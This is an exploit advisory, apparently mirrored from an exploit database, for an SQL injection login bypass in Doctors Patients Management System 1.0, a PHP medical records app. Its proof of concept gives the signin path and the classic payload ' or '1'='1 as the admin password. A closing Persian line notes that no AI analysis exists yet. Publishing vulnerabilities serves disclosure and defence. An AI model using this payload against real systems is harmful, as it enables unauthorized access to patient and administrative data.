Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)

Exploit Author: Murat DEMİRCİ Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2021-06-30

# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)
# Date: 06/30/2021
# Exploit Author: Murat DEMIRCI (butterflyhunt3r)
# Vendor Homepage: https://www.codester.com/
# Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system
# Version: 1.0
# Tested on: Windows 10
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.

# Proof of Concept :
http://test.com/PATH/signin

# Username : anything
# Password : ' or '1'='1

Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)

درحال حاضر تحلیل هوش مصنوعی برای این اکسپلویت تولید نشده است!